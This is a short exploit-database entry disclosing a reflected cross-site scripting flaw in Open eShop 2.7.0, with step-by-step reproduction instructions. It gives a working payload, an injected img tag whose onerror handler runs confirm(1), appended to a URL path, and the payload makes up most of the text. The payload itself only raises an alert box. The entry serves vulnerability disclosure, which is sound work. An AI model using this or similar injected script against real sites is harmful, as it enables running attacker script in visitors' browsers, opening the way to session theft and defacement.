id: 39552
date: 04/12/2024
title: Open eShop 2.7.0 Cross Site Scripting Vulnerability
author: tmrswrr
cves: 

# Exploit Title: Open eShop Version : 2.7.0  - Reflected XSS
# Exploit Author: tmrswrr 
# Vendor Homepage: http://www.open-eshop.com/
# Version : 2.7.0

1 ) Go to home page https://127.0.0.1/Open_eShop
2 ) Write url this payload : test.html"><img src=x onerrora=confirm() onerror=confirm(1)>

3 ) After save it you will be see xss alert

https://127.0.0.1/Open_eShop/test.html"><img src=x onerrora=confirm() onerror=confirm(1)>

#  0day.today [2024-04-14]  #